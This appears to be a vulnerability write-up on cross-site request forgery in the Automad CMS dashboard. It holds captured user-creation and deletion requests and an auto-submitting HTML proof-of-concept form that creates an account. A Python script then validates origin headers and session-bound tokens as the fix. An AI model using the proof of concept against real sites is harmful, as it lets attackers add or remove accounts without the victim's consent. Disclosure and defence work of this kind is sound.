Cross-Site Request Forgery (CSRF)

Testing showed that the application does not implement CSRF tokens by default: state-changing dashboard requests are authenticated by the session cookie alone, so a third-party page visited by a logged-in user can submit them on that user's behalf.

Any dashboard action the victim is permitted to perform can be forged this way; the examples below create and delete a user. The following is the request the dashboard sends when a logged-in user adds a new user:

POST /dashboard?controller=UserCollection::createUser HTTP/1.1
Host: automad.scr
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 76
Origin: http://automad.scr
Connection: close
Referer: http://automad.scr/dashboard?view=System
Cookie: Automad-8d86b702d2bd8d7c568d8600480adaef=feu6beoo6sc7ha2gp2gilsk211
X-PwnFox-Color: green

username=User&email=User%40example.com&password1=Passw0rd&password2=Passw0rd

CSRF HTML:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://automad.scr/dashboard?controller=UserCollection::createUser" method="POST">
      <input type="hidden" name="username" value="User" />
      <input type="hidden" name="email" value="User&#64;example&#46;com" />
      <input type="hidden" name="password1" value="Passw0rd" />
      <input type="hidden" name="password2" value="Passw0rd" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>


Deleting users follows the same pattern; the request below carries the target username and, again, no token:

POST /dashboard?controller=UserCollection::edit HTTP/1.1
Host: automad.scr
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 17
Origin: http://automad.scr
Connection: close
Referer: http://automad.scr/dashboard?view=System
Cookie: Automad-8d86b702d2bd8d7c568d8600480adaef=feu6beoo6sc7ha2gp2gilsk211
X-PwnFox-Color: green

delete%5B%5D=User
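Both captured requests share what makes the PoC work: a form-compatible `Content-Type`, authentication by the session cookie alone, and no token in the body. (The dashboard sends `X-Requested-With: XMLHttpRequest`, which a cross-site form post cannot add, but nothing indicates the server requires it, and that header alone is not a robust defence.) The Python script below is an added illustration of the server-side check that closes the hole; it is not code from the application or from the original write-up. It parses raw requests in the format shown above, rejects a POST whose `Origin` (or, failing that, `Referer`) is not the dashboard's own origin, and requires a per-session `csrf_token` form field bound to the session cookie with an HMAC. The `csrf_token` field name, the `attacker.example` host and the server secret are assumptions; the sample requests are constructed from the captures above.

```python
import hashlib
import hmac
from urllib.parse import parse_qs, urlsplit

# Origin of the dashboard, taken from the Host/Origin headers in the captured requests.
SITE_ORIGIN = "http://automad.scr"
# The session cookie in the captures is named "Automad-<hash>"; match on the prefix.
SESSION_COOKIE_PREFIX = "Automad-"
# Constructed for this example; a real deployment needs a random per-install secret.
SERVER_SECRET = b"constructed-example-secret"

# Constructed sample: the createUser request from the write-up, trimmed to the relevant headers.
CAPTURED_CREATE_USER = (
    "POST /dashboard?controller=UserCollection::createUser HTTP/1.1\r\n"
    "Host: automad.scr\r\n"
    "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
    "X-Requested-With: XMLHttpRequest\r\n"
    "Origin: http://automad.scr\r\n"
    "Referer: http://automad.scr/dashboard?view=System\r\n"
    "Cookie: Automad-8d86b702d2bd8d7c568d8600480adaef=feu6beoo6sc7ha2gp2gilsk211\r\n"
    "\r\n"
    "username=User&email=User%40example.com&password1=Passw0rd&password2=Passw0rd"
)
# Constructed sample: the same body as a browser would send it from the PoC page when hosted
# on a hypothetical attacker.example (a cross-site form post cannot set custom headers).
FORGED_CREATE_USER = (
    CAPTURED_CREATE_USER
    .replace("Origin: http://automad.scr", "Origin: http://attacker.example")
    .replace("Referer: http://automad.scr/dashboard?view=System",
             "Referer: http://attacker.example/poc.html")
    .replace("X-Requested-With: XMLHttpRequest\r\n", "")
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request (as pasted from a proxy) into method, target, headers, form fields."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return {"method": method, "target": target, "headers": headers, "form": form}


def session_id(headers):
    """Return the value of the Automad-* session cookie, or None."""
    for part in headers.get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name.startswith(SESSION_COOKIE_PREFIX):
            return value
    return None


def csrf_token(sid):
    """Per-session token: an HMAC of the session id, so the server needs no extra storage."""
    return hmac.new(SERVER_SECRET, sid.encode(), hashlib.sha256).hexdigest()


def check_csrf(req):
    """Return (accepted, reason) for a parsed request; every controller= action should pass through this."""
    if req["method"] in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method"
    h = req["headers"]
    # 1. Defence in depth: the request must originate from the dashboard's own origin.
    origin = h.get("origin")
    if origin is None and "referer" in h:
        parts = urlsplit(h["referer"])
        origin = f"{parts.scheme}://{parts.netloc}"
    if origin != SITE_ORIGIN:
        return False, f"cross-site origin {origin!r}"
    # 2. Primary defence: the body must carry the token bound to the session in the cookie.
    sid = session_id(h)
    if sid is None:
        return False, "no session"
    supplied = req["form"].get("csrf_token", "")
    if not hmac.compare_digest(supplied, csrf_token(sid)):
        return False, "missing or wrong csrf_token"
    return True, "ok"


def with_token(raw):
    """Constructed: the captured request as it would look once the dashboard appends the session token."""
    sid = session_id(parse_request(raw)["headers"])
    return raw + "&csrf_token=" + csrf_token(sid)


if __name__ == "__main__":
    for label, raw in [("captured, no token", CAPTURED_CREATE_USER),
                       ("forged from attacker.example", FORGED_CREATE_USER),
                       ("captured, token appended", with_token(CAPTURED_CREATE_USER))]:
        print(label, "->", check_csrf(parse_request(raw)))
```

Run against the three samples, the captured request is rejected because the dashboard never issued a token (this is the change the application needs: embed the token in the dashboard and send it with every action), the forged PoC is rejected at the origin check, and the captured request with the token appended is accepted. The origin check is kept as a second layer only: some clients and proxies strip `Referer`, and `Origin` can be `null`, so the token, not the header comparison, is the fix that matters.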